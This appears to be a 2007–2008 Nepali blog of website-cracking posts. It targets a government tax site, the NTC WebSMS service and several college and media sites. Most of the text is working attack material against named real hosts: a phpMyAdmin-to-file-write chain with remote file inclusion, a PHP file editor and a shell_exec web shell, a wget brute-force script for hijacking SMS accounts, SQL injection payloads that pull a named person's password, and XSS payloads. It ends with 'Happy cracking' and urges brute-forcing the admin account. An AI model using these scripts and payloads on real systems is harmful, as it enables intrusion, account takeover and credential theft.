Do Comment and I shall comment back. Your contributions are always welcome at emailadimn@gmail.com.
Nepali Security Community Accessible at NepSecure Google Groups

Sunday, January 6, 2008

Nepal Government's Inland Revenue Department (web.ird.gov.np) (Nepali) Website Cracked

please do not take this posting as an offense against your website. Our motive is to let you know insecurities in your website and also give options to improve them.

Information
Its been quite some time the inland revenue department's website was upped, there are features like e-pan, filling PAN bills, tax bills online. The website lists the general idea about IRD and stuffs.

Level of Vulnerability
9/10 - i was able to run commands, DOS commands in it!! del C:\*.*, kidding!!

Background
The website actually seems to be hosted in two different servers,
1) http://ird.gov.np
$ nslookup ird.gov.np
Non-authoritative answer:
Name: ird.gov.np
Address: 63.219.2.40

2) another subdomain, http://web.ird.gov.np
nslookup web.ird.gov.np
Non-authoritative answer:
Name: web.ird.gov.np
Address: 116.90.235.4

Looking at the website, information is arranged in pages, the urls have page=xyz type of syntax, umm, XSS?? and the table based layout! (1980s? albiet exageration) and the background image repeating in x, they can't even create a css entry, repeat: none; Optimized for 800x640 resolution and they forgot 1024x768?? Overall, very very disappointed. Footer has "Designed and Developed by Professional Computer System" What a shame!!

The Crack
Strangely I dont know why, I typed http://web.ird.gov.np/phpmyadmin/ and to my delight, it was unsecured!! unprotected virgin phpmyadmin, Althought the databases were empty. Meaning the core database is somewhere else, pirated Oracle Server ;-) my guess only!

So, Im stuck with a virgin phpmyadmin, what more can be done?
An hour of research!! and I found out that there is actually a mysql syntax to store output to a file!

Here is what I did,
Step
1) Went to the Query Section of PHPMyadmin
2) Execute this SQL
select "" into outfile '/url/to/www/root/page.php'

3) Hurrah! we got a working page.php ie, http://web.ird.gov.np/pan/page.php that takes arguement a url to a any file, also remote file! YES it can be this easy!
example, http://web.ird.gov.np/pan/page.php?page=http://someaddress/c.txt?asdf :-) NICE

4) Fire up my localserver, user ip address, say 10.10.10.10 (assuming)

5) First I executed this php script
1 <?php
2 $a = '
3 <?php
4 // if not empty $_POST["fname"] then save the content
5 if (!empty($_POST["fname"])) {
6 echo "Save Now";
7 file_put_contents($_POST["fname"], $_POST["fc"]); // by default overwrite, put FILE_APPEND as 3rd arguement to append
8 }
9 else
10 {
11 echo "No Save";
12 }
13
14 $f = file_get_contents($_GET["f"]); ?>
15 <form method="post">
16 <input type=hidden value=<?php echo $_GET["f"];?> name=fname />
17 <textarea rows=25 cols=100 name=fc><?php echo $f; ?></textarea>
18 <input type=submit value="save">
19 </form>
20 <?php echo $_POST["fname"]; ?>
21 <pre>
22 <? echo htmlspecialchars(stripslashes($_POST["fc"]),ENT_QUOTES); ?>
23 </pre>';
24
25 file_put_contents('./sth.php',$a);
26 echo "Output successful";
27 ?>


What it does is, saves the php
1 <?php
2 // if not empty $_POST["fname"] then save the content
3 if (!empty($_POST["fname"])) {
4 echo "Save Now";
5 file_put_contents($_POST["fname"], stripslashes($_POST["fc"])); // by default overwrite, put FILE_APPEND as 3rd arguement to append
6 }
7 else
8 {
9 echo "No Save";
10 }
11
12 $f = file_get_contents($_GET["f"]); ?>
13 <form method="post">
14 <input type=hidden value=<?php echo $_GET["f"];?> name=fname />
15 <textarea rows=25 cols=100 name=fc><?php echo $f; ?></textarea>
16 <input type=submit value="save">
17 </form>
18 <?php echo $_POST["fname"]; ?>
19 <pre>
20 <?php echo htmlspecialchars(stripslashes($_POST["fc"]),ENT_QUOTES); ?>
21 </pre>


Under filename sth.php, but then what does sth.php do? if you see the arguements it takes the get arguement f as the filename, loads the file from server, ready to be edited, works like a charm
1 <?php $f = file_get_contents($_GET["f"]); ?>


6) How did i execute it? renamed the script to c.txt and run
http://web.ird.gov.np/pan/page.php?page=http://10.10.10.10/c.txt?asdf and voila, i have a brand new sth.php to work with,

7) As a part of demo, I edited footer.php file to put hacked by n00b in it, here is a screen capture



8) Lastly to have some fun, i created a php file to run any commands by using system() function, here is the php file

1 <?php
2 if (!empty($_POST["test"])) {
3 $output = $_POST["test"]."2>&1";
4 echo "<pre>" . shell_exec($output) . "</pre>";
5 }?>
6 <form method="post">
7 <input name="test"/>
8 <input type="submit" value="send"/>
9 </form>


The server was unsecured Wamp, so i could do dir, copy, move, it was a virtual DOS!! :-D

How to fix it?
Well Duh!! Wamp is for home user, and for production use, it should be secured!! see wamp homepage for more details!

The admins of http://ird.gov.np have already been informed, and they have fixed it up very quickly, im glad, but the design looks same, no improvement, no nothing.

Atleast it wasn't another iranian hack!! Im not all badass! :-D

Unauthrized Access / Hijack NTC WebSMS Account

please do not take this posting as an offense against your website. Our motive is to let you know insecurities in your website and also give options to improve them.

Information
NTC WebSMS is a very popular service to send sms to any NTC's Namaste SIM Card holding user from their website. At most, one can send 10 SMS per day and this service is totally free, althought with a twist. The service is available to only NTC SIM card holder since to get an account, you need to fill in your SIM's pin number. Fine!!

When an sms is sent, the recipient receives a SMS from 2424 with the original number as the sender, as a header in SMS. This is how the recipient knows who sent the SMS.


Level of Vulnerability

7/10 since hijacking other's account is possible, but then you cannot do any other fun stuffs than to send SMS through this account.

The Flaw
I wonder what people think when they create a software. Do they think OMG, i got to finish this application ASAP, im drunk and its due tomorrow! Probably not, but then the password reset option in the website is seriously flawed!!

Steps involved in resetting password.
1) Go to login page, click forgot password
2) Put the cell phone number account, 9841123456(example), click Submit
3) You are given the message that the password has BEEN RESET and to see the email for further details.

Oh, now anyone can submit my cell phone number and hit submit, its instantly changed and oh the next time i try to login, i cannot, because the password has been changed by some pycho and i wasn't asked for any confirmation. LAME LAME!! I have to then manually open my related email address and then search for the email.

Disection of the new password
I got the email alright with my new password, it strikingly looks predictible, the format of the new password
if my username is 9841123456, my password is set to 9841123456XXX.0

Cough! Cough! the XXX is some randomly chosen number, could be 000 or 512 or any ther number between 000 to 999.


The Hack
You must have guessed it by now, but I still list the steps for everyone's convinience

To hack the websms account of 9841123456, follow following steps
Step
1) Go to login page, click on forgot password and type 9841123456, hit submit
2) Since the new password is gone to the original owner, we will now brute force WebSMS!
3) In my case, i created a shell script in bash, use wget to send post variables username and password that will randomly try passwords 9841123456000.0 to 9841123456999.0
4) The returned file is saved to 000.txt to 999.txt (Yes 1000 txt files)
5) I see the result, sort the files according to file size
6) The page saying username/password invalid is 3KB in size while page with successful login is around 16KB in size.
7) So if the file 512.txt is bigger than all the rest, the new password is 9841123456512.0
8) Login to websms using this password, go to Options and change settings, ie the primary email so that next time anyone tries to reset the password, i get the new SMS!


Script
Save the following lines of code as pwfinder.sh, give executable permission to it, change the value of b to any username
b=9841123456
a=000
while [ $a -lt 1000 ]
do
wget http://websms.ntc.net.np/websmss/login.jsp --post-data="username=$b&password=$b$a.0&flag=1" -O $a.txt
((a=a+1))
done


Pretty simple,
I did put an & at the last of wget so it ran in background, but then the number of connection at a time to ntc's web server were very high, and was giving weird results. Without the &, there is at most, one connection to NTC's websms werver, so results were as expected.

Find out which file is the biggest, use ur fav file browser, in my case
$ du . -a | sort -n and i can see the file at the bottom.

Cheers All
Happy cracking

PS. Do brute force the username admin, i saw some pretty nice links in it!!

Saturday, September 29, 2007

Kathmandu School of Law website (ksl.edu.np) vulnerable to SQL injection (minor hack)

please do not take this posting as an offense against your website. Our motive is to let you know insecurities in your website and also give options to improve them.

Thanks goes to laex8pearl for finding the loophole and mentioning about the website.

Information
The mission page of Kathmandu School of Law promptly states that "It is an emerging legal institution pioneering in the field of imparting quality education and is dedicated to maintain high standards of academic excellence. Its prime objective is to address the need of an academically sound and practically feasible legal education in Nepal."

Level of vulnerability
7/10 since we can extract passwords ^__^

Review of Kathmandu School Of Law Website
Most of the pages are made in asp. The front pages are nothing much interesting in terms of finding security fixes since they have general content. The interesting thing is at the articles section which has dynamic content and dynamic url.

So the login page can be seen at http://www.ksl.edu.np/login.asp

SQL Injection In Detail
It starts with testing whether inputs are escaped or not, well not in this website.
in the login page, enter ' or ' in both username and passwords and we're inside. :-) pretty simple, well nothing interesting inside though, we can post articles but not edit, nothing interesting at all.

To see what database they are using, enter ' garbage in both username and password and well pretty simple error as expected. In case of ksl.edu.np we have this out put

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver]
Syntax error (missing operator) in query expression 'email='' garbage' and password='' garbage''./login_validate.asp, line 25

Ok so Access Driver, not even a database server, humm a small site, can't expect much.

The real fun comes now, in the login screen we are asked to enter email address and password. That means lets find some already existing users.

On the articles section, there are couple of users listed, lets see if we can find more info on atleast one user.

Ok got it, here is one

nice, it seems he is the directer of ksl, lucky me, lets find his password :-D

For this we will exploit the article display page. Take a look at the url of articles page. Its in the format of http://www.ksl.edu.np/view_article.asp?id=24, for different articles, we have different ids.

Lets test it to get some more result, http://www.ksl.edu.np/view_article.asp?id=24 or id=23 will yeild a different article, humm it seems there is a order by id syntax at the end, i.e., the asp displays the article with least id.

Interensting!!! lets add our own article with id=1, that is minimum, how do we achieve it, its done by SQL union select.

First we need the name of the table, an easy guess article works!!! yeah!!!
http://www.ksl.edu.np/view_article.asp?id=24 union select 1,1 from article

It gives an error, saying this

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.

/view_article.asp, line 56

Interesting thing is UNION select works but the number of columns doesnot match, hit and trial led me to have 8 columns, ie this url works well http://www.ksl.edu.np/view_article.asp?id=24 union select 1,2,3,4,5,6,7,8 from article

Great, the title is in the 5th column and body in the 6th column. What next, lets see if we can find a password of existing user, that should be pretty simple huh??

first we need to guess the table name of table containing passwords, most probable guesses are accounts, users, members, ... in singular and plural forms. Lucky me, its member.

so how do we see the password?? execute this in the url
http://www.ksl.edu.np/view_article.asp?id=24 union select 1,2,3,4,5,(select password from member where email='sangroula@wlink.com.np'),7,8 from article



WORKS GREAT!!! finally a password,

How to remove the SQL Injection in the Kathmandu School Of Law website (ksl.edu.np), its really really simple,
Rule number 1, never trust the users, always sanitize everything you take as input and give output
Rule number 2, never display sql errors, hide them or redirect to say page not found
Rule number 3, use a framework, like drupal or mambo or joomla because these frameworks include community effort of thousands of people and they are really secure.

The admin of http://www.ksl.edu.np has been emailed about this.
SO don't be surprised if this didn't work.

Wednesday, September 19, 2007

CyberSansar website Vulnerable to Cross Site Scripting (XSS) (Moderate hack)

please do not take this posting as an offense against your website. Our motive is to let you know insecurities in your website and also give options to improve them.

Information
CyberSansar is one of the most visited websites in Nepal. Its popularity is due to its content which includes pictures of hot models. I haven't heard of another website with so many pictures of hot Nepali Females and in my guess, this website is a major attraction to a lot of Nepali males :-)

Level of Vulnerability 3/5

Review Of CyberSansar Website
Most of the webpages seem to take no arguments at all and strangely each link points to a specific named php file. All artists had artistname.php or Event informations were in event.php format.

This means the guys at CyberSansar must have a hell of a time managing all those .php files. My guess is that they have a centralized theming system and all pages use that theme.

To execute XSS, i had to find a page taking arguements. The download page was where i found it.
http://www.cybersansar.com/music/videos/music_videos.php and click on any picture takes you to say
http://www.cybersansar.com/music/videos/video.php?id=drabyaz_dherailamo#download

Cross Site Scripting (XSS) in Detail
http://www.cybersansar.com/music/videos/video.php?id=drabyaz_dherailamo#download is interesting url. I can just change the text after ?id= in video.php?id=drabyaz_dherailamo#download to anything else, say xyz
http://www.cybersansar.com/music/videos/video.php?id=xyz
ok this time what you get is a small picture not found image like this

looking at the source what you can see is


that means whatever you type after video.php?id= gets added to the url and so the url is changed, humm good
if you test with characters like (", <,>,/, ...) all bypass any kind of string escaping. Not good at all. Someone forgot to check the security.

A simple ur like
http://www.cybersansar.com/music/videos/download_events_programs.php?id="> <script>alert("hello");</script>
will give you an alert message, humm scripts execute successfully.

To display some another webpage, its pretty simple just include a iframe like this
url starts from here ----------------------
http://www.cybersansar.com/music/videos/download_events_programs.php?id="><iframe src="http://www.google.com" height="400" width="500"><
url ends from here ---------------------
will give you this


Cool huh?? but how do i deface CyberSansar?
Actually you cannot do server damages using XSS, AFAIK

How can this be misused?
There are tons of articles explaining the misuse ofXSS, so please read them.

Some of the misuses i can think of are
  • Inclusion of java scripts from third party websites means a lot of thing. the whole DOM is under control of the javascript, that means, a malformed url can change the look of the website.
  • Since CyberSansar is very popular, anyone can just create a page, add pictures of herself/himself and advertise as a model of cybersansar.
  • the google webpage is just an example, what if someone shows a porn site and tries to defame CyberSansar
  • Include a fake phishing page with a username and password field saying "Insert your hotmail username/password here and we will send your frields a special something", humm interesting.
Lots of other misuses can be done, XSS is dangerous, specially with old versions of IE or vulnerable browsers.

How to remove the XSS vulnerability in CyberSansar??
pretty simple, escape the passed id by using htmlspecialchars() function in php, very simple :-)

$id = htmlspecialchars($_GET['id']);

single line can work wonders. :-)

The admin of http://www.cybersansar.com has been emailed about this.
SO don't be surprised if this didn't work.

XSS Cheat Sheet at http://ha.ckers.org/xss.html
big thanks to them.

Tuesday, September 18, 2007

Kantipur Engineering College website Vulnerability to SQL Injection (minor hack)

please do not take this posting as an offense against your website. Our motive is to let you know insecurities in your website and also give options to improve them.

Kantipur Engineering College is one of the well known colleges of KTM. It provides undergraduate studies for Bachelor of Engineering in Computer Science, Electronics engineering and other faculties.
Please see their website at here.

Level of vulnerability 1/5
SQL Injection in detail

Most of the pages are static as it seems with no option for url modifications and fiddling with.
The only place to tinker with is at the news section. Which can be seen at the right inside a small column.

The url is as http://www.kec.edu.np/news.php?id=5 . Now this is very lucrative since its so common to just change the id and see what outputs result in.

at id=5 we get


To insert a simple sql we just change the 5 into some text say "asdf" and you will get
Unknown column 'asdf' in 'where clause'
It shows that the query is something like
select * from where id=variablename
and above error is exactly what you get when you insert a string in place of variablename.

what about
http://www.kec.edu.np/news.php?id=news_id
or
http://www.kec.edu.np/news.php?id=1 OR 1=1 or news.news_id=1 order by news.news_title desc


Humm it seems that it executes OK with no error. So we know one of the column names of the table.
Finally with simple human guess, the table should be named news, so doing a simple
http://www.kec.edu.np/news.php?id=news.news_id
and we have all the respective rows in the news table.

These are the fields of the news table
news_id, news_title,
news_date
which is seen by successfully executing this line

http://www.kec.edu.np/news.php?id=1 OR 1=1 or news.news_id=1 order by news.news_title, news.news_date desc


Also, we can do union select. Which means pretty much a lot of thing. But i bet they have anything interesting. The homepage already has nbsp all around the top links, very bad web design.

How to remove the sql injection??
The techniques are widely discussed on various websites.
  • This is a very helpful link on how to prevent sql injections.
    http://www.unixwiz.net/techtips/sql-injection.html#miti
  • Its bad idea to create a website from scratch because there will be lots of places where we would most probably overlook. SQL injection is just one of the many loop holes for hackers to get int our website.
Comments are more than welcome. We hope this helped the original web author of the website to fix his/her flaws.

The admin of http://www.kec.edu.np has been emailed about this.
SO don't be surprised if this didn't work.

Update
the mentioned email admin@kec.wlink.com.np gave a failure email, :-| so even their official email does not work. Somebody please inform the college web admins.